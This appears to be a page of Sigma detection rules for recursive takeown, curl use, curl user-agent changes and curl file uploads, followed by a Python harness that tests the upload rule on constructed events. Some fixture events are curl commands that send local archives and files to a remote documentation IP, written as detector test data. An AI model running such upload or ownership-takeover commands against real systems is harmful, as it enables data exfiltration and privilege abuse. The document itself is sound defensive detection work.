Techniques
Sample rules
Suspicious Recursive Takeown
- source: sigma
- techniques:
  - t1222
  - t1222.001
Description
Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant them higher permissions on specific files and folders.
Detection logic
condition: selection
selection:
    CommandLine|contains|all:
        - '/f '
        - '/r'
    Image|endswith: '\takeown.exe'
Curl Usage on Linux
- source: sigma
- techniques:
  - t1105
Description
Detects a curl process start on Linux, which indicates a file download from a remote location or a simple web request to a remote server.
Detection logic
condition: selection
selection:
    Image|endswith: '/curl'
Suspicious Curl Change User Agents - Linux
- source: sigma
- techniques:
  - t1071
  - t1071.001
Description
Detects a suspicious curl process start on Linux with a user agent option set.
Detection logic
condition: selection
selection:
    CommandLine|contains:
        - ' -A '
        - ' --user-agent '
    Image|endswith: '/curl'
Suspicious Curl File Upload - Linux
- source: sigma
- techniques:
  - t1105
  - t1567
Description
Detects a suspicious curl process start that adds a file to a web request.
Detection logic
condition: all of selection_* and not 1 of filter_optional_*
filter_optional_localhost:
    CommandLine|contains:
        - '://localhost'
        - '://127.0.0.1'
selection_cli:
    - CommandLine|contains:
        - ' --form'
        - ' --upload-file '
        - ' --data '
        - ' --data-'
    - CommandLine|re: '\s-[FTd]\s'
selection_img:
    Image|endswith: '/curl'
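The upload rule's condition (all selections must match, and no optional filter may match) written out as a small Python matcher run over constructed process-creation events. This is an added example, not code from the page or from the Sigma project; the event dictionaries, their Image and CommandLine values and the remote addresses are constructed for illustration.

```python
import re

# Constructed process-creation events (not real telemetry); the field names
# mirror Sigma's process_creation logsource (Image, CommandLine).
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -F file=@/tmp/archive.tgz http://203.0.113.10/upload"},
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl --upload-file ./dump.tgz http://localhost:8080/"},
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -A 'Mozilla/5.0' http://example.com/"},
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget --post-file=x http://203.0.113.10/"},
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -d @notes.txt https://203.0.113.10/api"},
]

# Values taken from the rule above.
UPLOAD_TERMS = [" --form", " --upload-file ", " --data ", " --data-"]
UPLOAD_FLAG_RE = re.compile(r"\s-[FTd]\s")
LOCALHOST_TERMS = ["://localhost", "://127.0.0.1"]


def selection_img(ev):
    # Image|endswith: /curl
    return ev.get("Image", "").endswith("/curl")


def selection_cli(ev):
    # A YAML list of maps under one selection is an OR between the entries:
    # long-form upload options, or the short -F/-T/-d flags via the regex.
    cl = ev.get("CommandLine", "")
    return any(t in cl for t in UPLOAD_TERMS) or UPLOAD_FLAG_RE.search(cl) is not None


def filter_optional_localhost(ev):
    # Uploads to the local host are carved out as benign by the rule author.
    cl = ev.get("CommandLine", "")
    return any(t in cl for t in LOCALHOST_TERMS)


def matches_curl_file_upload(ev):
    # condition: all of selection_* and not 1 of filter_optional_*
    return selection_img(ev) and selection_cli(ev) and not filter_optional_localhost(ev)


def run_rule(events=SAMPLE_EVENTS):
    """Return the command lines of events the rule would alert on."""
    return [ev["CommandLine"] for ev in events if matches_curl_file_upload(ev)]


if __name__ == "__main__":
    for hit in run_rule():
        print("ALERT:", hit)
```

Note that the regex requires whitespace on both sides of the short flag, so a command line ending in `-F` with nothing after it is not matched; that is the rule's behaviour, not a defect of this harness.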